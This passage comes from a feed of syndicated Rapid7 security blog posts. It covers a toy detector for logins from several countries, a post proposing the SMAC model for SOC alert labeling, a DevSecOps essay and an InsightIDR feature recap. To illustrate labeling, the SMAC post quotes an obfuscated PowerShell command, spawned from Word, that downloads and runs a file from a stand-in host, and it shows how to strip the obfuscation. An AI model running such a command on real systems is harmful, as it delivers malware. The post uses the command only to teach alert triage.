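To illustrate the multi-country detection concept from the second bullet (this is not InsightIDR's actual implementation, just a toy sketch over made-up data), a simple Python pass over ingress events might look like this:

from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical ingress events: (user, country, timestamp)
events = [
    ("hfinn", "US", datetime(2021, 2, 16, 9, 0)),
    ("hfinn", "RO", datetime(2021, 2, 16, 9, 20)),
    ("asawyer", "US", datetime(2021, 2, 16, 10, 5)),
]

WINDOW = timedelta(hours=1)  # "at the same time" approximated as within one hour

by_user = defaultdict(list)
for user, country, ts in events:
    by_user[user].append((country, ts))

for user, logins in by_user.items():
    logins.sort(key=lambda pair: pair[1])
    for (c1, t1), (c2, t2) in zip(logins, logins[1:]):
        if c1 != c2 and (t2 - t1) <= WINDOW:
            print(f"Possible compromised account: {user} logged in from {c1} and {c2} within an hour")

A real detection would, of course, enrich source IPs with geolocation and threat intelligence rather than trusting a pre-labeled country field.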

For details on how to configure and leverage the GCP event source, check out our help docs.

Looking for more cloud coverage? Learn how InsightIDR covers both Azure and AWS cloud environments.


Talkin’ SMAC: Alert Labeling and Why It Matters

Post Syndicated from matthew berninger original https://blog.rapid7.com/2021/02/12/talkin-smac-alert-labeling-and-why-it-matters/

Talkin’ SMAC: Alert Labeling and Why It Matters

If you’ve ever worked in a Security Operations Center (SOC), you know that it’s a special place. Among other things, the SOC is a massive data-labeling machine, and it generates some of the most valuable data in the cybersecurity industry. Unfortunately, much of this valuable data is rendered useless because of how it is labeled; the way we label data in the SOC matters greatly. Sometimes decisions made with good intentions to save time or effort can inadvertently result in the loss or corruption of data.

Thoughtful measures must be taken ahead of time to ensure that the hard work SOC analysts apply to alerts results in meaningful, usable datasets. If properly recorded and handled, this data can be used to dramatically improve SOC operations. This blog post will demonstrate some common pitfalls of alert labeling, and will offer a new framework for SOCs to use—one that creates better insight into operations and enables future automation initiatives.

First, let’s define the scope of “SOC operations” for this discussion. All SOCs are different, and many do much more than alert triage, but for the purposes of this blog, let’s assume that a “typical SOC” ingests cybersecurity data in the form of alerts or logs (or both), analyzes them, and outputs reports and action items to stakeholders. Most importantly, the SOC decides which alerts don’t represent malicious activity, which do, and, if so, what to do about them. In this way, the SOC can be thought of as applying “labels” to the cybersecurity data that it analyzes.

There are at least three main groups that care about what the SOC is doing:

  1. SOC leadership/management
  2. Customers/stakeholders
  3. Intel/detection/research

These groups have different and sometimes overlapping questions about each alert. We will try to categorize these questions below into what we are now calling the Status, Malice, Action, Context (SMAC) model.

  • Status: SOC leaders and MDR/MSSP management typically want to know: Is this alert open? Is anyone looking at it? When was it closed? How long did it take?
  • Malice: Detection and threat intel teams want to know whether signatures are doing a good job separating good from bad. Did this alert find something malicious, or did it accidentally find something benign?
  • Action: Customers and stakeholders want to know if they have a problem, what it is, and what to do about it.
  • Context: Stakeholders, intelligence analysts, and researchers want to know more about the alert. Was it a red team? Was it internal testing? Was it malware tied to advanced persistent threat (APT) actors, or was it a “commodity” threat? Was the activity sinkholed or blocked?
Talkin’ SMAC: Alert Labeling and Why It Matters

What do these dropdowns all have in common? They are all trying to answer at least two—sometimes three or four—questions with only one drop down menu. Menu 1 has labels that indicate Status and Malice. Menu 2 covers Status, Malice, and Context. Menu 3 is trying to answer all four categories at once.

I have seen and used other interfaces in which “Status” labels are broken out into a separate dropdown, and while this is good, not separating the remaining categories—Malice, Action, or Context—still creates confusion.

I have also seen other interfaces like Menu 3, with dozens of choices available for seemingly every possible scenario. However, this does not allow for meaningful enforcement of different labels for different questions, and again creates confusion and noise.

What do I mean by confusion? Let’s walk through an example.

Malicious or Benign?

Here is a hypothetical Windows process start alert:

Parent Process: WINWORD.EXE

Process: CMD.EXE

Process Arguments: 'pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N ^(ne^w-O^BJe^c^T ^SY^STeM. Ne^T^.^w^eB^cLie^n^T^).^Do^W^nlo^aDfi^Le(^’http:// www[.]badsite[.]top/user.php?f=1.dat’,^’%USERAPPDATA%. eXe’);s^T^ar^T-^PRO^ce^s^S^ ^%USERAPPDATA%.exe'

In this example, let’s say the above details are the entirety of the alert artifact. Based solely on this information, an analyst would probably determine that this alert represents malicious activity. There is no clear legitimate reason for a user to perform this action in this way and, in fact, this syntax matches known malicious examples. So it should be labeled Malicious, right?
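
As an aside, part of what makes this an easy call is that the carets are just cmd.exe escape characters, so the obfuscation peels away trivially. A short, illustrative Python snippet (over a shortened copy of the arguments above) shows the idea:

# Shortened copy of the obfuscated arguments from the alert above
obfuscated = "pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N"

# cmd.exe treats ^ as an escape character, so removing the carets reveals the real command line
print(obfuscated.replace("^", ""))
# -> poweRSheLL.eXe -executIonPOLIcY ByPaSs -nOProfILe -WIndoWSTYLe HiDdeN

With the carets gone, the execution policy bypass, profile suppression, and hidden window flags are plain to see, which is exactly what drives the Malicious verdict.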

What if it’s not a threat?

However, what if, upon review of related network logs around the time of this execution, we found out that the connection to the www[.]badsite[.]top command and control (C2) domain was sinkholed? Would this alert now be labeled Benign or Malicious? Well, that depends who’s asking.

The artifact, as shown above, is indeed inherently malicious. The PowerShell command intends to download and execute a file within the %USERAPPDATA% directory, and has taken steps to hide its purpose by using PowerShell obfuscation characters. Moreover, PowerShell was spawned by WINWORD.EXE, which is something that isn’t usually legitimate. Last, this behavior matches other publicly documented examples of malicious activity.

Though we may have discovered the malicious callback was sinkholed, nothing in the alert artifact gives any indication that the attack was not successful. The fact that it was sinkholed is completely separate information, acquired from other, related artifacts. So from a detection or research perspective, this alert, on its own, is 100% malicious.

However, if you are the stakeholder or customer trying to manage a daily flood of escalations, tickets, and patching, the circumstantial information that it was sinkholed is very important. This is not a threat you need to worry about. If you get a report about some commodity attack that was sinkholed, that may be a waste of your time. For example, you may have internal workflows that automatically kick off when you receive a Malicious report, and you don’t want all that hassle for something that isn’t an urgent problem. So, from your perspective, given the choice between only Malicious or Benign, you may want this to be called Benign.

Downstream effects

Now, let’s say we only had one level of labeling and we marked the above alert Benign, since the connection to the C2 was sinkholed. Over time, analysts decide to adopt this as policy: mark as Benign any alert that doesn’t present an actual threat, even if it is inherently malicious. We may decide to still submit an “informational” report to let them know, but we don’t want to hassle customers with a bunch of false alarms, so they can focus on the real threats.

Talkin’ SMAC: Alert Labeling and Why It Matters

A year later, management decides to automate the analysis of these alerts entirely, so we have our data scientists train a model on the last year of labeled process-based artifacts. For some reason, the whiz-bang data science model routinely misses obfuscated PowerShell attacks! The reason, of course, is that the model saw a bunch of these marked “Benign” in the learning process, and has determined that obfuscated PowerShell syntax reaching out to suspicious domains like the above is perfectly fine and not something to worry about. After all, we have been teaching it that with our “Benign” designation, time and time again.

Our model’s false negative rate is through the roof. “Surely we can go back and find and re-label those,” we decide. “That will fix it!” Perhaps we can, but doing so requires us to perform the exact same work we already did over the past year. By limiting ourselves to one level of labeling, we have corrupted months of expensive expert analysis and rendered it useless. In order to fix it so we can automate our work, we now have to do even more work. And indeed, without separated labeling categories, we can fall into this same trap in other ways—even with the best intentions.

The playbook pitfall

Let’s say you are trying to improve efficiency in the SOC (and who isn’t, right?!). You identify that analysts spend a lot of time clicking buttons and copying alert text to write reports. So, after many months of development, you unveil the wonderful new Automated Response Reporting Workflow, which of course you have internally dubbed “Project ARRoW.” As soon as an analyst marks an alert as ‘Malicious’, a draft report is auto-generated with information from the alert and some boilerplate recommendations. All the analyst has to do is click “publish,” and poof—off it goes to the stakeholder! Analysts love it. Project ARRoW is a huge success.

However, after a month or so, some of your stakeholders say they don’t want any more Potentially Unwanted Program (PUP) reports. They are using some of the slick Application Programming Interface (API) integrations of your reporting portal, and every time you publish a report, it creates a ticket and a ton of work on their end. “Stop sending us these PUP reports!” they beg. So, of course you agree to stop—but the problem is that with ARRoW, if you mark an alert Malicious, a report is automatically generated, so you have to mark them Benign to avoid that. Except they’re not Benign.

Now your PUP signatures look bad even though they aren’t! Your PUP classification model, intended to automatically separate true PUP alerts from False Positives, is now missing actual Malicious activity (which, remember, all your other customers still want to know about) because it has been trained on bad labels. All this because you wanted to streamline reporting! Before you know it, you are writing individual development tickets to add customer-specific expectations to ARRoW. You even build a “Customer Exception Dashboard” to keep track of them all. But you’re only digging yourself deeper.

Talkin’ SMAC: Alert Labeling and Why It Matters

Applying multiple labels

The solution to this problem is to answer separate questions with separate answers. Applying a single label to an alert is insufficient to answer the multiple questions SOC stakeholders want to know:

  1. Has it been reviewed? (Status)
  2. Is it indicative of malicious activity? (Malice)
  3. Do I need to do something? (Action)
  4. What else do we know about the alert? (Context)

These questions should be answered separately in different categories, and that separation must be enforced. Some categories can be open-ended, while others must remain limited multiple choice.

Let me explain:

Status: The choices here should include default options like OPEN, CLOSED, REPORTED, ESCALATED, etc. but there should be an ability to add new status labels depending on an organization’s workflow. This power should probably be held by management, to ensure new labels are in line with desired workflows and metrics. Setting a label here should be mandatory to move forward with alert analysis.

Malice: This category is arguably the most important one, and should ideally be limited to two options total: Malicious or Benign. To clarify, I use Benign here to denote an activity that reflects normal usage of computing resources, but not for usage that is otherwise malicious in nature but has been mitigated or blocked. Moreover, Benign does not apply to activities that are intended to imitate malicious behavior, such as red teaming or testing. Put most simply, “Benign” activities are those that reflect normal user and administrative usage.

Note: If an org chooses to include a third label such as “Suspicious,” rest assured that this label will eventually be abused, perhaps in situations of circumstantial ambiguity, or as a placeholder for custom workflows. Adding any choices beyond Malicious or Benign will add noise to this dataset and reduce its usefulness. And take note—this reduction in utility is not linear. Even at very low levels of noise, the dataset will become functionally worthless. Properly implemented, analysts must choose between only Malicious or Benign, and entering a label here should be mandatory to move forward. If caveats apply, they can be added in a comments section, but all measures should be taken before polluting the label space.

Action: This is where you can record information that answers the question “Should I do something about this?” This can include options like “Active Compromise,” “Ignore,” “Informational,” “Quarantined,” or “Sinkholed.” Managers and administrators can add labels here as needed, and choosing a label should be mandatory to move forward. These labels need not be mutually exclusive, meaning you can choose more than one.

Context: This category can be used as a catch-all to record any information that you haven’t already captured, such as attribution, suspected malware family, whether or not it was testing or a red-team, etc. This is often also referred to as “tagging.” This category should be the most open to adding new labels, with some care taken to normalize labels so as to avoid things like ‘APT29’ vs. ‘apt29’, etc. This category need not be mandatory, and the labels should not be mutually exclusive.

Note: Because the Context category is the most flexible, there are potentials for abuse here. SOC leadership should regularly audit newly created Context labels and ensure workarounds are not being built to circumvent meaningful labeling in the previous categories.
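
To show how the separation described above might be enforced in practice, here is a minimal, hypothetical Python sketch of a SMAC-style label record. The vocabularies and field names are illustrative only, not a prescribed schema:

from dataclasses import dataclass, field

# Hypothetical label vocabularies; in practice these would be managed by SOC leadership
STATUS = {"OPEN", "CLOSED", "REPORTED", "ESCALATED"}
MALICE = {"Malicious", "Benign"}  # deliberately limited to two choices
ACTION = {"Active Compromise", "Ignore", "Informational", "Quarantined", "Sinkholed"}

@dataclass
class AlertLabel:
    status: str
    malice: str
    action: set = field(default_factory=set)   # may hold more than one label
    context: set = field(default_factory=set)  # open-ended tags, e.g. {"red team", "apt29"}

    def __post_init__(self):
        if self.status not in STATUS:
            raise ValueError(f"Unknown status: {self.status}")
        if self.malice not in MALICE:
            raise ValueError("Malice must be exactly Malicious or Benign")
        unknown = self.action - ACTION
        if unknown:
            raise ValueError(f"Unknown action labels: {unknown}")
        # Context tags are normalized rather than restricted (avoids 'APT29' vs. 'apt29')
        self.context = {tag.strip().lower() for tag in self.context}

# The sinkholed PowerShell example: inherently Malicious, but nothing for the stakeholder to do
label = AlertLabel(
    status="REPORTED",
    malice="Malicious",
    action={"Sinkholed", "Informational"},
    context={"Commodity Malware", "Obfuscated PowerShell"},
)

The key design point is that Malice stays a strict two-value field, while Action can carry several labels and Context stays open-ended, so a "malicious but sinkholed" alert no longer forces anyone to misuse Benign.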

Garbage in, garbage out

Supervised SOC models are like new analysts—they will “learn” from what other analysts have historically done. In a very simplified sense, when a model is “trained” on alert data, it looks at each alert, looks at the corresponding label, and tries to draw connections as to why that label was applied. However, unlike human analysts, supervised SOC models can’t ask follow-on contextual questions like, “Hey, why did you mark this as Benign?” or “Why are some of these marked ‘Red Team’ and others are marked ‘Testing’?” The machine learning (ML) model can only learn from the labels it is given. If the labels are wrong, the model will be wrong. Therefore, taking time to really think through how and why we label our data a certain way can have ramifications months and years later. If we label alerts properly, we can measure—and therefore improve—our operations, threat intel, and customer impact more successfully.

I also recognize that anyone in user interface (UI) design may be cringing at this idea. More buttons and more clicks in an already busy interface? Indeed, I have had these conversations when trying to implement systems like this. However, the long-term benefit of having statistically meaningful data outweighs the cost of adding another label or three. Separating categories in this way also makes the alerting workflow a much richer target for automated rules engines. Because of the multiple categories, automatic alert-handling rules need not be all-or-nothing; they can be tailored to more complex combinations of labels.

Why should we care about this?

Imagine a world when SOC analysts don’t have to waste time reviewing obvious false positives, or repetitive commodity malware. Imagine a world where SOC analysts only tackle the interesting questions—new types of evil, targeted activity, and active compromises.

Imagine a world where stakeholders get more timely and actionable alerts, rather than monthly rollups and the occasional after-action report when alerts are missed due to capacity issues.

Imagine centralized ML models learning directly from labels applied in customer SOCs. Knowledge about malicious behavior detected in one customer environment could instantaneously improve alert classification models for all customers.

SOC analysts with time to do deeper investigations, more hunting, and more training to keep up with new threats. Stakeholders with more value and less noise. Threat information instantaneously incorporated into real-time ML detection models. How do we get there?

The first step is building meaningful, useful alert datasets. Using a labeling scheme like the one described above will help improve fidelity and integrity in SOC alert labels, and pave the way for these innovations.

Talkin’ SMAC: Alert Labeling and Why It Matters

Finding Results at the Intersection of Security and Engineering

Post Syndicated from Chaim Mazal original https://blog.rapid7.com/2021/01/25/finding-results-at-the-intersection-of-security-and-engineering/

Finding Results at the Intersection of Security and Engineering

As vice president and head of global security at ActiveCampaign, I’m fortunate to be able to draw on a multitude of experiences and successes in my career. I started in general network security, where I was involved in pen testing and security research. I worked at several multibillion-dollar SaaS organizations—including three of the largest startups in Chicago—building out end-to-end application security programs, secure software-development lifecycles, and comprehensive security platforms.

From a solution-focused standpoint, I’ve learned that collaborating with teams to build a security culture is way more effective than simply identifying and assigning tasks.

Our “team up” approach

At ActiveCampaign, security is a full-fledged member of the technology organization. We adopt an engineering-first approach, eschewing traditional “just-throw-it-over-the-wall” actions. So, we certainly consider ourselves to be more than simply an advisory or compliance team. I’m proud of the fact that we roll up our sleeves and are right there with other parts of the tech organization, leading innovation and helping maintain compliance and deployment. The earlier you can build security into the process, the better (and the more money you’ll eventually save). We never want DevOps to feel like they need to complete tasks in a vacuum—instead, we’re partners.  

This extends to how we secure and deploy our cloud-based fleet. We don’t feel that we need to constantly maintain assets—rather, we look at them holistically and integrate solutions across the quarter. To achieve this view, we rely on Rapid7 solutions like InsightIDR dashboards. They help us to see whether anything has gone outside of our established parameters, serving as a continuous validation that procedures within our cloud-based policies are working without variance. They act as a last line of defense, if you will. So, when alerts for cloud-based tools do come in, security teams can draft project plans to help alleviate risk, create guardrails to deploy assets across environments, and then partner up to get it all done. This is an untraditional approach, but one where we’ve seen a ton of success in strengthening partnerships across the organization.

What we’ve achieved

During my time at ActiveCampaign, our approach has yielded what I believe are strong results and achievements. In this industry, we all have similar challenges, so it demands tailored solutions. There’s risk in convincing stakeholders to continually integrate new processes in the hope that it will all pay off at some future date. But this team believed in that work. So, here are just a few of our successes:

  • The security team has ramped up to a hands-on role in the development of templates, solutions, and real-time cloud-based policy. This has helped to enable our DevOps and engineering orgs to take a more efficient, security-first approach.
  • We now have the ability to execute one-click deployments across 90% of our fleet through automations and managed instances.
  • You can’t fix what you don’t have visibility into, so we put in the effort to get to a place where we have full uniform deployments of logging and security tooling across our fleet.
  • For greater transparency, we created parity across different asset types. This meant developing multiple classifications as well as asset-based safeguards and controls. From there, we had a clearer understanding of organizational limitations that enabled us to collaborate efficiently across teams to resolve issues.
  • We can take steps to get to a future state, even if something doesn’t work today. As such, we’ve become extremely flexible at developing stop-gap measures while simultaneously working on long-term paths to upgrade or resolve issues.

Some key tips and takeaways

I don’t believe there is any one perfect path, and no doubt your path will be different than ours here at ActiveCampaign. In my view, it’s about leveraging teamwork and partnerships to achieve your DevSecOps goals. That being said, let’s discuss a few learnings that might be helpful.  

  • If you have to do something more than once, see if there is a way to automate that process going forward. Being more efficient doesn’t cost a thing.
  • Convincing stakeholders and potential partners that the security org is more than, well, a security org, can go a long way in gaining support from decision-makers beyond or above your teams. Security can be an engineering partner that helps to power profit and value.
  • Get to your future state by proactively creating project plans that add insight into or address current investment limitations on your security team(s).
  • When it comes to partnering, there is also the other side of the proverbial coin. And that is not to assume everyone will have the same enthusiasm to work together across orgs. So, the takeaway here would be to communicate that DevSecOps is a shared responsibility, and not meant to be an inefficient detractor from a mission statement. In this way, everyone’s path to that shared responsibility will be different, but always remember that partnering—especially earlier in the process—is meant to create efficiencies.

The future state

Security, in its ideal form, is something we’ll always strive for. At ActiveCampaign, we continuously try to make strides toward that “engineering org” ideal. Time and again, with efforts to align security with customer value, I’m happy to see stakeholders, from the C-suite to board members, ultimately start to see how customers benefit. Then it gets easier to obtain additional support so we can get to that future state of protection, production, and value.

I love highlighting efforts like those of our security product-engineering team. They’re building authentication features like SSO and MFA into our platform, on behalf of customers. When we can translate more security initiatives into operational and customer value, I get excited about the future of our industry and what we can do to protect and accelerate the pace of business.

What’s New in InsightIDR: Q4 2020 in Review

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2020/12/18/whats-new-in-insightidr-q4-2020-in-review/

What’s New in InsightIDR: Q4 2020 in Review

Throughout the year, we’ve provided roundups of what’s new in InsightIDR, our cloud-based SIEM tool (see the H1 recap post, and our most recent Q3 2020 recap post). As we near the end of 2020, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR from Q4 2020.

Complete endpoint visibility with enhanced endpoint telemetry (EET)

With the addition of the enhanced endpoint telemetry (EET) add-on module, InsightIDR customers now have the ability to access all process start activity data (aka any events captured when an application, service, or other process starts on an endpoint) in InsightIDR’s log search. This data provides a full picture of endpoint activity, enabling customers to create custom detections, see the full scope of an attack, and effectively detect and respond to incidents. Read more about this new add-on in our blog here, and see our on-demand demo below.

Network Traffic Analysis: Insight Network Sensor for AWS now in general availability

In our last quarterly recap, we introduced our early access period for the Insight Network Sensor for AWS, and today we’re excited to announce its general availability. Now, all InsightIDR customers can deploy a network sensor on their AWS Virtual Private Cloud and configure it to communicate with InsightIDR. This new sensor generates the same data outputs as the existing Insight Network Sensor, and its ability to deploy in AWS cloud environments opens up a whole new way for customers to gain insight into what is happening within their cloud estates. For more details, check out the requirements here.

What’s New in InsightIDR: Q4 2020 in Review

New Attacker Behavior Analytics (ABA) threats

Our threat intelligence and detection engineering (TIDE) team and SOC experts are constantly updating our detections as they discover new threats. Most recently, our team added 86 new Attacker Behavior Analytics (ABA) threats within InsightIDR. Each of these threats is a collection of three rules looking for one of 38,535 specific Indicators of Compromise (IoCs) known to be associated with a malicious actor’s various aliases.  

In total, we have 258 new rules, or three for each type of threat. The new rule types for each threat are as follows:

  • Suspicious DNS Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Web Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Process – <Malicious Actor Name> Related Binary Executed

New InsightIDR detections for activity related to recent SolarWinds Orion attack: The Rapid7 Threat Detection & Response team has compared publicly available indicators against our existing detections, deployed new detections, and updated our existing detection rules as needed. We also published in-product queries so that customers can quickly determine whether activity related to the breaches has occurred within their environment. Rapid7 is closely monitoring the situation, and will continue to update our detections and guidance as more information becomes available. See our recent blog post for additional details.

Custom Parser editing

InsightIDR customers leveraging our Custom Parsing Tool can now edit fields in their pre-existing parsers. With this new addition, you can update the parser name, extract additional fields, and edit existing extracted fields. For detailed information on our Custom Parsing Tool capabilities, check out our help documentation here.

What’s New in InsightIDR: Q4 2020 in Review

Record user-driven and automated activity with Audit Logging

Available to all InsightIDR customers, our new Audit Logging service is now in Open Preview. Audit Logging enables you to track user-driven and automated activity in InsightIDR and across Rapid7’s Insight Platform, so you can investigate who did what, when. Audit Logging will also help you fulfill compliance requirements if these details are requested by an external auditor. Learn more about the Audit Logging Open Preview in our help docs here, and see step-by-step instructions for how to turn it on here.

What’s New in InsightIDR: Q4 2020 in Review

New event source integrations: Cybereason, Sophos Intercept X, and DivvyCloud by Rapid7

With our recent event source integrations with Cybereason and Sophos Intercept X, InsightIDR customers can spend less time jumping in and out of multiple endpoint protection tools and more time focusing on investigating and remediating attacks within InsightIDR.

  • Cybereason: Cybereason’s Endpoint Detection and Response (EDR) platform detects events that signal malicious operations (Malops), which can now be fed as an event source to InsightIDR. With this new integration, every time an alert fires in Cybereason, it will get relayed to InsightIDR. Read more in our recent blog post here.
  • Sophos Intercept X: Sophos Intercept X is an endpoint protection tool used to detect malware and viruses in your environment. InsightIDR features a Sophos Intercept X event source that you can configure to parse alert types as Virus Alert events. Check out our help documentation here.
  • DivvyCloud: This past spring, Rapid7 acquired DivvyCloud, a leader in Cloud Security Posture Management (CSPM) that provides real-time analysis and automated remediation for cloud and container technologies. Now, we’re excited to announce a custom log integration where cloud events from DivvyCloud can be sent to InsightIDR for analysis, investigations, reporting, and more. Check out our help documentation here.

Stay tuned for more!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.

Not an InsightIDR customer? Start a free trial today.

Get Started